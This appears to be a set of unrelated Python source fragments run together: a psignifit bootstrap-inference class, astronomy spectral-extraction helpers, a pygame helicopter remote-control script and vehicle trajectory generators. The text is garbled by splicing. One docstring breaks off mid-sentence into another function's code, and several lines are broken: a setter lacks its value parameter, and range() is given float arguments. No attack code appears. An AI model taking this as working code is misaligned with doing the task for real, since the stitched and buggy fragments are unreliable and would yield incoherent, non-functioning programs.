return self.__plotting["linestyle"]
def fset ( self, v ):
self.__plotting["linestyle"] = v
@Property
def linewidth ():
"Linewidth used in plots"
def fget ( self ):
return self.__plotting["linewidth"]
def fset ( self ):
self.__plotting["linewidth"] = v
@Property
def marker ():
"Data marker used in plots"
def fget ( self ):
return self.__plotting["marker"]
def fset ( self, v ):
self.__plotting["marker"] = v
def __getstate__ ( self ):
state = self.__dict__.copy()
del state['_pmf']
del state['_data']
return state
def __setstate__ ( self, state ):
self.__dict__.update(state)
self._data,self._pmf,self.nparams = sfu.make_dataset_and_pmf (
self.data, self.model["nafc"], self.model["sigmoid"], self.model["core"], self.model["priors"], gammaislambda=self.model["gammaislambda"] )
##############################################################################################################################
class BootstrapInference ( PsiInference ):
def __init__ ( self, data, sample=False, cuts=(.25,.5,.75), conf=(.025,.975), plotprm=None, **kwargs ):
"""Set up an object of bootstrapped data
:Parameters:
*data* :
an array or a list of lists containing stimulus intensities in the
first column, number of correct responses (nAFC) or number of YES-
responses in the second column, and number of trials in the third
column. Each row should correspond to one experimental block. In
addition, the sequence of the rows is taken as the sequence of
data aquisition. Alternatively, the relative frequencies of correct
responses resp YES responses can be given.
*sample* :
if sample is True, bootstrap samples are drawn. If sample is an
integer, it gives the number of samples that are drawn
*sigmoid* :
shape of the sigmoid function. Valid choices are
- 'logistic' (1+exp(-x))**-1 [Default]
- 'gauss' Phi(x)
- 'gumbel_l' 1 - exp(-exp(x))
- 'gumbel_r' exp(-exp(-x))
- 'exponential' x>0: 1 - exp(-x); else: 0
- 'cauchy' atan(x)/pi + 0.5
- 'id' x; only useful in conjunction with NakaRushton core
*core* :
term inside the sigmoid function. Valid choices are
- 'ab' (x-a)/b [Default]
- 'mw%g' midpoint and width, with "%g" a number larger than 0 and less than 0.5.
mw%g corresponds to a parameterization in terms of midpoint and width of
the rising part of the sigmoid. This width is defined as the length of the
interval on which the sigmoidal part reaches from "%g" to 1-"%g".
- 'linear' a+b*x
- 'log' a+b*log(x)
- 'weibull' 2*s*m*(log(x)-log(m))/log(2) + log(log(2))
This will give you a weibull if combined with the gumbel_l sigmoid and a
reverse weibull if combined with the gumbel_r sigmoid.
- 'poly' (x/a)**b Will give you a weibull if combined with an exp sigmoid
- 'NakaRushton' The Naka-Rushton nonlinearity; should only be used with an id core
*priors* :
a list of prior names. Valid choices are
- 'Uniform(%g,%g)' Uniform distribution on an interval
- 'Gauss(%g,%g)' Gaussian distribution with mean and standard deviation
- 'Beta(%g,%g)' Beta distribution
- 'Gamma(%g,%g)' Gamma distribution
- 'nGamma(%g,%g)' Gamma distribution on the negative axis
- 'invGamma(%g,%g)' inverse Gamma distribution
- 'ninvGamma(%g,%g)' inverse Gamma distribution on the negative axis
If no valid prior is selected, the parameter remains unconstrained.
Alternatively, priors can be given as a dictionary that only specifies
priors for those parameters you want to set in that case you can use
'a','b','m','w','guess','gamma','lapse','lambda' as keys.
*nafc* :
number of response alternatives. If nafc==1, this indicates a Yes/No
task
*cuts* :
performance values that should be considered 'thresholds'. This means that a
'cut' of 0.5 corresponds to an expected performance of roughly 75%% correct in
a 2AFC task.
*conf* :
limits of confidence intervals. The default gives 95%% confidence intervals.
Any other sequence can be used alternatively. In addition, conf can be 'v1.0'
to give the default values of the classical psignifit version (i.e. .023,.159,.841,.977,
corresponding to -2,-1,1,2 standard deviations for a gaussian).
*parametric* :
a boolean indicating wether or not parametric bootstrap should be used
*plotprm* :
a dictionary to take parameters for plotting data. Currently supported are the arguments
'label', 'color', 'linestyle', 'linewidth' and 'marker'. These can all be set after creating
an Inference instance, too. By using the respective properties.
*gammaislambda* :
constrain guessing and lapsing rate to have the same values
:Example:
Estimate | |
is both faster and more
optimal...
Note that if 'spectrum' and 'template' are of different lengths,
the longer one will be trimmed at the end to make the lengths match.
:REQUIREMENTS:
`emcee <http://TBD>`_
"""
#2012-04-25 20:53 IJMC: Created
# 2012-09-23 20:17 IJMC: Now spectrum & template can be different length.
# 2013-03-09 17:23 IJMC: Added nthread option
import emcee
import phasecurves as pc
nlam_s = len(spectrum)
nlam_t = len(template)
if nlam_s <= nlam_t:
template = np.array(template, copy=True)[0:nlam_s]
etemplate = np.array(etemplate, copy=True)[0:nlam_s]
nlam = nlam_s
spectrum_trimmed = False
else: # nlam_s > nlam_t:
spectrum0 = np.array(spectrum, copy=True)
spectrum = spectrum0[0:nlam_t]
wtemplate = np.array(wtemplate, copy=True)[0:nlam_t]
nlam = nlam_t
spectrum_trimmed = True
# Create a normalized vector of coordinates for computing
# normalized polynomials:
dx0 = 1. / (nlam - 1.)
x0n = dx0 * np.arange(nlam) - 1.
#x0n = 2*np.arange(nlam, dtype=float) / (nlam - 1.) - 1
if guess is None:
# Start with a simple linear wavelength solution.
guess = [np.diff(wtemplate).mean() * len(template)/2, np.mean(wtemplate), np.median(template)/np.median(spectrum), 1.]
# Define arguments for use by fitting routines:
fitting_args = (makemodel, x0n, spectrum, wtemplate, template, 1./etemplate**2)
# Try to find an initial best fit:
bestparams = an.fmin(pc.errfunc, guess, args=fitting_args, disp=False)
# Initial fit is likely a local minimum, so explore parameter
# space using an MCMC approach.
ndim = len(guess)
nwalkers = ndim * 50
sampler = emcee.EnsembleSampler(nwalkers, ndim, pc.lnprobfunc, args=fitting_args, threads=nthread)
# Initialize the sampler with various starting positions:
e_params1 = np.vstack((np.array(guess)/10., np.zeros(ndim) + .01)).max(0)
e_params2 = np.vstack((bestparams/10., np.zeros(ndim) + .01)).max(0)
p0 = np.vstack(([guess, bestparams], \
[np.random.normal(guess, e_params1) for ii in xrange(nwalkers/2-1)], \
[np.random.normal(bestparams, e_params2) for ii in xrange(nwalkers/2-1)]))
# Run the sampler for a while:
pos, prob, state = sampler.run_mcmc(p0, 300) # Burn-in
bestparams = sampler.flatchain[np.nonzero(sampler.lnprobability.ravel()==sampler.lnprobability.ravel().max())[0][0]]
# Optimize the latest set of best parameters.
bestparams = an.fmin(pc.errfunc, bestparams, args=fitting_args, disp=False)
dispersionSolution = bestparams[0:-2]
if spectrum_trimmed:
x0n_original = dx0 * np.arange(nlam_s) - 1.
wavelengths = np.polyval(dispersionSolution, x0n_original)
else:
wavelengths = np.polyval(dispersionSolution, x0n)
return dispersionSolution, wavelengths, bestparams
def makemodel(params, xvec, specvec, wtemplate):
"""Helper function for :func:`wavelengthMatch`: generate a scaled,
interpolative model of the template."""
wcoef = params[0:-2]
scale, offset = params[-2::]
neww = np.polyval(wcoef, xvec)
return offset + scale * np.interp(wtemplate, neww, specvec, left=0, right=0)
def normalizeSpecFlat(flatdat, nspec=1, minsep=50, median_width=51, readnoise=40, badpixelmask=None, traces=None):
"""Trace and normalize a spectroscopic flat field frame.
:INPUTS:
flatdat : 2D NumPy array
Master, unnormalized flat frame: assumed to be measured in
photoelectrons (for computing uncertainties).
nspec : int
Number of spectral orders to find and normalize
minsep : int
Minimum separation, in pixels, between spectral orders that
will be found.
median_width : int
Width of median-filter kernel used to compute the low-
readnoise : scalar
Detector read noise, in electrons. For computing uncertainties.
badpixelmask : 2D NumPy array
bad pixel mask: 1 at bad pixel locations, 0 elsewhere.
traces : 2D NumPy Array
(nord, pord) shaped numpy array representing the polynomial
coefficients for each order (suitable for use with
np.polyval), as produced by :func:`traceorders`
"""
# 2012-04-28 06:22 IJMC: Created
# 2012-07-24 21:04 IJMC: Now, as a final step, all bad indices are set to unity.
# 2014-12-17 20:07 IJMC: Added 'traces' option
import analysis as an
from scipy import signal
if badpixelmask is None:
badpixelmask = np.zeros(flatdat.shape, bool)
# Enforce positivity and de-weight negative flux values:
e_flatdat = np.sqrt(flatdat + readnoise**2)
badindices = ((flatdat<=0) + badpixelmask).nonzero()
e_flatdat[badindices] = flatdat[badindices] * 1e9
flatdat[badindices] = 1.
# Find spectral orders, using derivatives (will probably fail if
# spec. overlaps the edge!):
ordvec = an.meanr(flatdat, axis=1, nsigma=3)
filtvec = signal.medfilt(ordvec, 9)
dvec1 = np.diff(filtvec)
dvec2 = -np.diff(filtvec)
dvec1[dvec1<0] = 0.
dvec2[dvec2<0] = 0.
x1 = np.arange(dvec1.size)
available1 = np.ones(dvec1.size, dtype=bool)
available2 = np.ones(dvec1.size, dtype=bool)
pos1 = []
pos2 = []
for ii in range(nspec):
thisx1 = x1[dvec1==dvec1[available1].max()][0]
available1[np.abs(x1 - thisx1) < minsep] = False
pos1.append(thisx1)
thisx2 = x1[dvec2==dvec2[available2].max()][0]
available2[np.abs(x1 - thisx2) < minsep] = False
pos2.append(thisx2)
limits = np.array(zip(np.sort(pos1), np.sort(pos2)))
# Generate and normalize the spectral traces:
masterflat = np.ones(flatdat.shape, dtype=float)
if traces is not None:
nx = flatdat.shape[1]
xvec = np.arange(nx)
ymat = np.tile(np.arange(flatdat.shape[0]), (nx, 1)).T
for ii in range(nspec):
if traces is None:
profvec = np.median(flatdat[limits[ii,0]:limits[ii,1], :], axis=0)
e_profvec = np.sqrt(an.wmean(flatdat[limits[ii,0]:limits[ii,1], :], 1./e_flatdat[limits[ii,0]:limits[ii,1], :]**2, axis=0) / np.diff(limits[ii]))[0]
e_profvec[e_profvec <= 0] = profvec.max()*1e9
smooth_prof = signal.medfilt(profvec, median_width)
masterflat[limits[ii,0]:limits[ii,1], :] = flatdat[limits[ii,0]:limits[ii,1], :] / smooth_prof
else:
traceloc = np.polyval(traces[ii], xvec)
limind = (limits[:,1] > traceloc.mean()).nonzero()[0][0]
order_ind_2d = ((ymat - traceloc) > (limits[limind,0] - traceloc.mean())) * ((ymat - traceloc) < (limits[limind,1] - traceloc.mean()))
profvec = np.array([np.median(flatdat[order_ind_2d[:,jj], jj]) for jj in xrange(nx)])
smooth_prof = signal.medfilt(profvec, median_width)
for jj in xrange(nx):
masterflat[order_ind_2d[:,jj],jj] = flatdat[order_ind_2d[:,jj],jj] / smooth_prof[jj]
# Ideally, we would do some sort of weighted fitting here. Instead,
# for now, just take a running median:
masterflat[badindices] = 1.
return masterflat
def optspecextr_idl(frame, gain, readnoise, x1, x2, idlexec, clobber=True, tempframefn='tempframe.fits', specfn='tempspec.fits', scriptfn='temp_specextract.pro', IDLoptions="adjfunc='adjgauss', adjoptions={center:1,centerfit:1,centerdeg:3}, bgdeg=3", inmask=None):
"""Run optimal spectral extraction in IDL; pass results to Python.
:INPUTS:
frame : str
filename, or 2D Numpy Array, or list of filenames containing
frames from which spectra will be extracted. This should be
in units of ADU (not electrons) for the noise properties to
come out properly.
Also, the spectral trace must run vertically across the frame.
gain : scalar
Detector gain, in electrons / ADU
readnoise : scalar
Detector read noise, in electrons
x1, x2 : ints, or lists of ints
Start and stop indices of the spectral trace across the frame.
If multiple frames are input and a single x1/x2 is input, the
same value will be used for each frame. Note however that
multiple x1/x2 can also be input (one for each frame).
idlexec : str
Path to the IDL executable. OPTSPECEXTR.PRO and its
associated files must be in your IDL path. If set to None,
then it will be set to: os.popen('which idl').read().strip()
:OPTIONS:
clobber : bool
Whether to overwrite files when writing input data to TEMPFRAMFN.
tempframefn : str
If input 'frame' is an array, it will be written to this
filename in order to pass it to IDL.
specfn : str
IDL will write the spectral data to this filename in order to
pass it back to Python.
scriptfn : str
Filename in which the short IDL script will be written.
IDLoptions : str
Options to pass to OPTSPECEXTR.PRO. For example:
"adjfunc='adjgauss', adjoptions={center:1,centerfit:1,centerdeg:3}, bgdeg=3"
Note that this Python code will break if you _don't_ trace
the spectrum (adjoptions, etc.); this is an area for future
work if I ever use a spectrograph with straight traces.
inmask : None or str
Name of the good pixel mask for OPTSPECEXTR.PRO. Equal to 1
for good pixels, and 0 for bad pixels.
:OUTPUTS:
For each input frame, a list of four items:
[0] -- Extracted spectrum, ADU per pixel
[1] -- Uncertainty (1 sigma) of extracted spectrum
[2] -- Location of trace (in pixels) across the frame
[3] -- Width of trace across the frame
:NOTES:
Note that this more closely follows Horne et al. than does
:func:`optimalExtract`, and is faster than both that function
and (especially!) :func:`extractSpectralProfiles`. The only
downside (if it is one) is that this function requires IDL.
:TO-DO:
Add options for user input of a variance frame, or of sky variance.
Allow more flexibility (tracing, input/output options, etc.)
:REQUIREMENTS:
IDL
`OPTSPECEXTR <http://physics.ucf.edu/~jh/ast/software.html>`_
"""
# 2012-08-18 16:36 IJMC: created
# 2012-08-19 09:39 IJMC: Added 'inmask' option.
import os
try:
from astropy.io import fits as pyfits
except:
import pyfits
# Put the input frames in the proper format:
if isinstance(frame, np.ndarray):
frameisfilename = False
if frame.ndim==2:
frames = [frame]
elif frame.ndim==1:
print "Input array should be 2D or 3D -- no telling what will happen next!"
else:
frames = frame
else:
frameisfilename = True
if isinstance(frame, str):
frames = [frame]
else:
frames = frame
if not hasattr(x1, '__iter__'):
x1 = [x1] * len(frames)
if not hasattr(x2, | |
<reponame>vivin/syma
#
# Python virtual remote control for Syma S107. This program sends data to the serial port
# when it receives an acknowledgement for more data from the arduino. The UI simulates
# (rather crudely) a throttle stick, and a yaw/pitch stick, along with a trim control.
#
# This script also includes a simple form of flow control. We're rendering the controls at
# 20fps, which means that we would effectively be sending 20 packets a second to the arduino.
# Unfortunately, the arduino can only consume 10 packets every second. Therefore, it is prudent
# to send data only when the arduino needs it. Whenever the arduino needs data, it will send a
# byte through the serial channel that lets the python script know that it can send data. Until
# then, the script will queue up data into a local buffer (pretty much a queue).
#
# Author: <NAME>
# http://vivin.net
#
import pygame
import math
import os
import serial
import struct
from collections import deque
# Define some colors
black = ( 0, 0, 0)
white = ( 255, 255, 255)
blue = ( 50, 50, 255)
green = ( 0, 255, 0)
dkgreen = ( 0, 100, 0)
red = ( 255, 0, 0)
purple = (0xBF,0x0F,0xB5)
brown = (0x55,0x33,0x00)
# Define some constants
ARDUINO_SERIAL_PORT = "/dev/ttyACM0"
ARDUINO_SERIAL_BAUD_RATE = 9600
CONTROL_RADIUS = 83
JOYSTICK_RADIUS = 20
CONTROL_X = 550
CONTROL_Y = 250
WINDOW_X = 400
WINDOW_Y = 200
THROTTLE_X = 175
THROTTLE_Y = 188
THROTTLE_WIDTH = 34
THROTTLE_HEIGHT = 129
THROTTLE_MAX = 127
THROTTLE_MIN = 0
TRIM_X = 280
TRIM_Y = 320
TRIM_MAX = 126
TRIM_MIN = 0
TRIM_HEIGHT = 34
TRIM_WIDTH = 129
TRIM_MARKER_HEIGHT = 44
TRIM_MARKER_WIDTH = 4
TRANSLATION_FACTOR = 63
TITLE_X = 400
TITLE_Y = 10
VALUES_X = 400
VALUES_Y = 30
THROTTLE_UP_KEY = pygame.K_w
THROTTLE_DOWN_KEY = pygame.K_s
TRIM_LEFT_KEY = pygame.K_a
TRIM_RIGHT_KEY = pygame.K_d
YAW = 0
PITCH = 1
THROTTLE = 2
TRIM = 3
ZERO_YAW = 63
ZERO_PITCH = 63
ZERO_THROTTLE = 0
ZERO_TRIM = 63
# Function to draw the background
def draw_background(screen):
# Set the screen background
screen.fill(white)
# Function to calculate the distance between two points
def distance(x1, y1, x2, y2):
return math.sqrt(math.pow(x2 - x1, 2) + math.pow(y2 - y1, 2))
# Function to limit the x and y coordinate of the joystick. We call this method if the distance between the current x and y coordinate of the mouse
# and the center of the control is greater than the difference between CONTROL_RADIUS and JOYSTICK_RADIUS. The limited x and y coordinate is the
# intersection of the line between the current x and y coordinate and the center of the control and the circle with radius CONTROL_RADIUS - JOYSTICK_RADIUS
def limit(x, y):
rise = y - CONTROL_Y
run = x - CONTROL_X
sign_x = 1
if CONTROL_X < 0:
sign_x = -1
sign_y = 1
if CONTROL_Y < 0:
sign_y = -1
limit_x = sign_x * ((CONTROL_RADIUS - JOYSTICK_RADIUS) * run) / math.sqrt(math.pow(rise, 2) + math.pow(run, 2))
limit_y = sign_y * ((CONTROL_RADIUS - JOYSTICK_RADIUS) * rise) / math.sqrt(math.pow(rise, 2) + math.pow(run, 2))
return (limit_x + CONTROL_X, limit_y + CONTROL_Y)
# Open a serial connection to arduino in non-blocking mode
connection = serial.Serial(ARDUINO_SERIAL_PORT, ARDUINO_SERIAL_BAUD_RATE, timeout = 0);
# Position the window
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (WINDOW_X, WINDOW_Y)
pygame.init()
# Set the height and width of the screen
size = [800, 600]
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Syma S107 Virtual Remote Control")
#Loop until the user clicks the close button.
done = False
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
# Set the initial position of the mouse to be on top of our joystick
pygame.mouse.set_pos(CONTROL_X, CONTROL_Y)
# A boolean that states whether the joystick is active. This happens when the user clicks the mousebutton while on the joystick
control_active = False
# These two variables keep track of the position of the joystick. Let's initialize these to be at the center of the control circle
currX = CONTROL_X
currY = CONTROL_Y
# Keeps track of the current throttle value
throttle = 0
# Keeps track of the current trim value
trim = 63
# Keep track of the previous values for these attributes. We want to send data only if something has changed
previousYaw = 0
previousPitch = 0
previousThrottle = 0
previousTrim = 0
# The python script sends 20 packets every second (because we're rendering 20 frames a second). However, the arduino is configured
# to send data to the helicopter at 10 packets every second. Essentially we're sending data twice as fast as the arduino can consume
# it. To prevent loss of data, we do two things. First, we only send data if any of the values (yaw, pitch, throttle, trim) have
# changed, and second, we only send data if the arduino asks for it. When the arduino is ready to accept data, it sends a byte
# (129) through the serial channel. This lets the python script know that it can send data.
READY_TO_ACCEPT_ACK = 129
# Since we're sending data to the arduino almost twice as fast as it can consume it, let's buffer our data until we actually need
# to send it. To do this, we'll use a queue.
commandValues = deque([]);
while done == False:
draw_background(screen)
# Get mouse-button states
(button1, button2, button3) = pygame.mouse.get_pressed();
# Get keyboard-button states
states = pygame.key.get_pressed();
if states[THROTTLE_UP_KEY]:
throttle += 1
if throttle > THROTTLE_MAX:
throttle = THROTTLE_MAX
if states[THROTTLE_DOWN_KEY]:
throttle -= 1
if throttle < THROTTLE_MIN:
throttle = THROTTLE_MIN
if states[TRIM_LEFT_KEY]:
trim += 1
if trim > TRIM_MAX:
trim = TRIM_MAX
if states[TRIM_RIGHT_KEY]:
trim -= 1
if trim < TRIM_MIN:
trim = TRIM_MIN
# Get the current mouse position. This returns the position
# as a list of two numbers.
pos = pygame.mouse.get_pos()
# Fetch the x and y out of the list,
x = pos[0]
y = pos[1]
# Calculate the distance between current mouse coordinates and the center of the control circle
dist = distance(x, y, CONTROL_X, CONTROL_Y)
# If the control isn't already active and we're clicking the left mouse-button, it means that we
# might be clicking the joystick
if not control_active and button1:
# The distance is lesser than the joystick radius, which means that clicking on the joystick
if dist < JOYSTICK_RADIUS:
control_active = True
# Otherwise, it means that the left mouse-button is not clicked, so let's reset the position of the
# joystick to the center of the control
elif not button1:
control_active = False
(currX, currY) = (CONTROL_X, CONTROL_Y)
# If the control is active, it means that we are pressing the left mouse-button and moving the joystick.
if control_active:
# If the distance between the current mouse coordinates is greater than CONTROL_RADIUS - JOYSTICK_RADIUS
# it means that we're trying to push the joystick out of the control circle. So let's limit the x and y
# coordinate
if dist > (CONTROL_RADIUS - JOYSTICK_RADIUS):
(currX, currY) = limit(x, y)
else:
(currX, currY) = (x, y)
# Draw control and joystick
pygame.draw.circle(screen, black, [CONTROL_X, CONTROL_Y], CONTROL_RADIUS, 1)
pygame.draw.circle(screen, black, [int(round(currX)), int(round(currY))], JOYSTICK_RADIUS, 0)
# Draw throttle control with throttle level
pygame.draw.rect(screen, green, [THROTTLE_X + 1, (THROTTLE_Y + THROTTLE_HEIGHT) - throttle - 1, THROTTLE_WIDTH - 2, throttle], 0)
pygame.draw.rect(screen, black, [THROTTLE_X, THROTTLE_Y, THROTTLE_WIDTH, THROTTLE_HEIGHT], 1)
# Draw trim control
pygame.draw.rect(screen, black, [TRIM_X, TRIM_Y, TRIM_WIDTH, TRIM_HEIGHT], 1)
pygame.draw.rect(screen, black, [TRIM_X + (TRIM_WIDTH / 2) - (TRIM_MARKER_WIDTH / 2) - trim + TRANSLATION_FACTOR, TRIM_Y - ((TRIM_MARKER_HEIGHT - TRIM_HEIGHT) / 2), TRIM_MARKER_WIDTH, TRIM_MARKER_HEIGHT], 0)
# Calculate yaw and pitch values
yaw = int(round(CONTROL_X - currX)) + TRANSLATION_FACTOR
pitch = TRANSLATION_FACTOR - int(round(CONTROL_Y - currY))
# Create a font
font = pygame.font.Font(None, 22)
# Render the title
title = font.render("Syma S107 Virtual Remote Control" , True, black)
titleRect = title.get_rect();
titleRect.centerx = TITLE_X
titleRect.centery = TITLE_Y
# Render the yaw, pitch, trottle, and trim values
values = font.render("Yaw: " + str(yaw) + " Pitch: " + str(pitch) + " Throttle: " + str(throttle) + " Trim: " + str(trim), True, blue);
valuesRect = values.get_rect();
valuesRect.centerx = VALUES_X
valuesRect.centery = VALUES_Y
# Blit the text
screen.blit(title, titleRect)
screen.blit(values, valuesRect)
# Go ahead and update the screen with what we've drawn.
pygame.display.flip()
# Write values to arduino only if they have | |
# [rad / m]
max_turn_length = min(length,
min(200.0,
length if turning_rate == 0.0 else \
(120 * pi / 180.0) / fabs(turning_rate)))
turn_length = random.uniform(1, max_turn_length)
# print('seg: ', turning_rate, turn_length, max_turn_length)
segment_length = turn_length \
if turning_rate == 0 else \
min(turn_length, (2 * pi / 180.0) / fabs(turning_rate))
# segment_length = 1.0
# segment_angle = (turning_rate + random.gauss(0.0, difficulty * 5.0 * (pi / 180))) * segment_length
segment_angle = turning_rate * segment_length
# print(segment_angle, segment_length, turning_rate, turn_length)
angle += segment_angle
delta = Vec2d(segment_length, 0.0)
delta.rotate(angle)
last = waypoints[-1]
next = last[0] + delta
waypoints.append((next, target_speed))
distance += segment_length
turn_length -= segment_length
return waypoints, False
def curriculum_curved_trajectory_factory(
min_speed=5,
max_speed=45,
speed_step=5.0,
num_turning_rate_steps=5,
min_turn_rate_multiplier=.5,
max_turn_rate_multiplier=1.5,
num_turns_per_step=2,
min_turn_arc=60 * pi / 180,
max_turn_arc=120 * pi / 180,
) -> Callable[['TrajectoryTrackingProcess'], Tuple[List[Tuple[Vec2d, float]], bool]]:
def curriculum_curved_trajectory_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
length = 0.0
angle = 0.0
num_speed_steps = 1 + int(ceil((max_speed - min_speed) / speed_step))
waypoints = [(Vec2d(0, 0), min_speed), (Vec2d(10.0, 0), min_speed)]
# print('num_speed_steps', num_speed_steps)
for s in range(num_speed_steps):
min_step_speed = s * speed_step + min_speed
# http://dotapp7.dot.state.mn.us/edms/download?docId=1062356
mid_turning_radius = 1.0 * ((min_step_speed * 3.6) ** 2) / (127 * (0.0 + .12))
mid_turning_rate = 1.0 / mid_turning_radius
min_turning_rate = min_turn_rate_multiplier * mid_turning_rate
max_turning_rate = max_turn_rate_multiplier * mid_turning_rate
# num_turning_steps = 1 + int(ceil((min_turning_rate - max_turning_rate) / turning_rate_step))
# print('num_turning_steps', num_turning_steps, min_turning_rate, mid_turning_rate, max_turning_rate)
turning_rate_step = (max_turning_rate - min_turning_rate) / num_turning_rate_steps
for t in range(num_turning_rate_steps):
base_turn_rate = min_turning_rate + t * turning_rate_step
for i in range(num_turns_per_step):
target_speed = min_step_speed + random.uniform(0, speed_step)
turn_rate = min(max_turning_rate, base_turn_rate + random.uniform(0, turning_rate_step))
turn_arc = random.uniform(min_turn_arc, max_turn_arc)
# turn_direction = 1 if (i % 2 == 0) else -1
turn_direction = 1 if bool(random.getrandbits(1)) else -1
# turn_length = turn_rate / turn_arc
remaining_arc = turn_arc
while remaining_arc > 1e-3:
arc = min(remaining_arc, 5.0 * pi / 180.0)
remaining_arc -= arc
line_length = arc / turn_rate
line_angle = turn_direction * arc
angle += line_angle
delta = Vec2d(line_length, 0.0)
# print(line_length)
delta.rotate(angle)
last = waypoints[-1]
next = last[0] + delta
waypoints.append((next, target_speed))
length += line_length
# pprint(waypoints)
# print('length: ', length)
return waypoints, False
return curriculum_curved_trajectory_generator
def curriculum_angled_trajectory_factory(
min_speed=5,
max_speed=45,
speed_step=4.0,
num_turning_rate_steps=4,
min_turn_rate_multiplier=0,
max_turn_rate_multiplier=1.5,
# num_turns_per_step=2,
step_length=300,
transition_length=10,
min_turn_arc=60 * pi / 180,
max_turn_arc=120 * pi / 180,
random_seed=2,
) -> Callable[['TrajectoryTrackingProcess'], Tuple[List[Tuple[Vec2d, float]], bool]]:
r = random.Random(random_seed)
# length = 0.0
angle = 0.0
num_speed_steps = 1 + int(ceil((max_speed - min_speed) / speed_step))
previous_speed = min_speed
# start with a straight line
# waypoints = [(Vec2d(0, 0), min_speed), (Vec2d(transition_length, 0), min_speed)]
waypoints = [(Vec2d(0, 0), previous_speed)]
# print('num_speed_steps', num_speed_steps)
for s in range(num_speed_steps):
min_step_speed = s * speed_step + min_speed
# http://dotapp7.dot.state.mn.us/edms/download?docId=1062356
mid_turning_radius = 1.0 * ((min_step_speed * 3.6) ** 2) / (127 * (0.0 + .12))
mid_turning_rate = 1.0 / mid_turning_radius
min_turning_rate = min_turn_rate_multiplier * mid_turning_rate
max_turning_rate = max_turn_rate_multiplier * mid_turning_rate
# num_turning_steps = 1 + int(ceil((min_turning_rate - max_turning_rate) / turning_rate_step))
# print('num_turning_steps', num_turning_rate_steps)
turning_rate_step = (max_turning_rate - min_turning_rate) / num_turning_rate_steps
for t in range(num_turning_rate_steps):
base_turn_rate = min_turning_rate + t * turning_rate_step
# for i in range(num_turns_per_step):
remaining_length = step_length
while remaining_length > 0:
target_speed = min_step_speed + r.uniform(0, speed_step)
# straightaway at beginning of each turn
line_length = min(transition_length, remaining_length)
delta = Vec2d(line_length, 0.0)
delta.rotate(angle)
next = waypoints[-1][0] + delta
waypoints.append((next, (target_speed + previous_speed) / 2))
remaining_length -= line_length
turn_rate = min(max_turning_rate, base_turn_rate + r.uniform(0, turning_rate_step))
turn_arc = r.uniform(min_turn_arc, max_turn_arc)
turn_direction = 1 if bool(r.getrandbits(1)) else -1
# turn_length = turn_rate / turn_arc
remaining_arc = turn_arc
while remaining_arc > 1e-3 and remaining_length > 0:
# arc = 0.0
# max_arc = 5.0 * pi / 180.0
# min_arc = 1.0 * pi / 180.0
# if remaining_arc >= max_arc:
# arc = r.uniform(min_arc, max_arc)
# else:
# arc = remaining_arc
arc = min(remaining_arc, 2.0 * pi / 180.0)
remaining_arc -= arc
line_length = min(remaining_length, arc / turn_rate)
line_angle = turn_direction * arc
# if arc >= remaining_arc:
line_angle += r.gauss(0.0, 2.0 * pi / 180.0)
target_speed = clamp(target_speed + r.gauss(0.0, .5), min_speed, max_speed)
angle += line_angle
delta = Vec2d(line_length, 0.0)
delta.rotate(angle)
next = waypoints[-1][0] + delta
waypoints.append((next, target_speed))
remaining_length -= line_length
previous_speed = target_speed
# Plotting curriculum path for jul14_2020_experiments:
# import matplotlib.pyplot as plt
# import numpy as np
# point_locations = np.array([[point[0].x, point[0].y] for point in waypoints])
# speeds = np.array([elem[1] for elem in waypoints])
#
# plt.figure()
# plt.plot(point_locations[:, 0], point_locations[:, 1], color = 'gray', label = 'path')
# plt.fill_between(x = point_locations[:, 0], y1 = point_locations[:, 1] - speeds,
# y2 = point_locations[:, 1] + speeds, color = 'gray', label = '2 * target speed',
# alpha = 0.7)
# plt.scatter(point_locations[0, 0], point_locations[0, 1], color='b', marker='o', label='start')
# plt.scatter(point_locations[-1, 0], point_locations[-1, 1], color='r', marker='o', label='end')
# plt.legend()
# plt.xlabel('X [m]', fontsize = 14)
# plt.ylabel('Y [m]', fontsize = 14)
# plt.title("RL Training Path", fontsize = 24)
# plt.savefig('curriculum_path.svg', format = 'svg')
####
def curriculum_angled_trajectory_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
return waypoints, False
return curriculum_angled_trajectory_generator
def lee_2018_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
"""
Path found in Lee 2018.
https://journals.plos.org/plosone/article?id=10.1371/journal.pone.0194110
"""
target_speed: float = 20.
distance_1: float = 200.
radius_1: float = 200.
radius_2: float = 100.
waypoints = []
waypoints += [(Vec2d(0, 0), target_speed)]
waypoints += [(Vec2d(distance_1, 0), target_speed)]
for phase in range(pi / 2., 0, -pi / 1000):
waypoints += [(Vec2d(radius_1 * cos(phase) - distance_1, \
radius_1 * sin(phase) - radius_1), target_speed)]
for phase in range(pi, 3 * pi / 2., pi / 1000):
waypoints += [(Vec2d(radius_2 * cos(phase) + \
distance_1 + radius_1 + radius_2, \
radius_2 * sin(phase) - radius_1))]
return waypoints
def sine_trajectory_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
target_speed = 30.
return [(Vec2d(1000 * (i / 100.0), 20.0 * sin(2 * (i / 100.0) * 2 * pi)), target_speed)
for i in range(100)], False
def sine_trajectory_factory(
length: float = 3000.0,
amplitude: float = 20,
wavelength: float = 10.0,
target_speed: float = 10.0,
) -> Callable[['TrajectoryTrackingProcess'], Tuple[List[Tuple[Vec2d, float]], bool]]:
def trajectory_generator(process: 'TrajectoryTrackingProcess'):
segment_length = wavelength / 2000
num_segments = ceil(length / segment_length)
return [(Vec2d(
length * (float(i / num_segments)),
amplitude * sin(2 * (float(i / num_segments)) * 2 * pi)),
target_speed)
for i in range(num_segments)], False
return trajectory_generator
def carla_json_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
"""
This will query the file from carla-collect.
if online, the value for filename will be queried from online
if online, the value for filename will be from the local files
"""
import json
filename: str = 'town01/long_scenario_000.json'
online: bool = True
if online:
import requests
req = requests.get('https://github.nrel.gov/raw/HPC-CAVs/carla-collect/' \
'master/docs/scenarios/' + filename)
content = req.json()
else:
content = json.load(filename)
start_point = [content['meta']['start_point_x'], content['meta']['start_point_y']]
path_list = []
x = []
y = []
pairs = []
target_speed: float = 30.
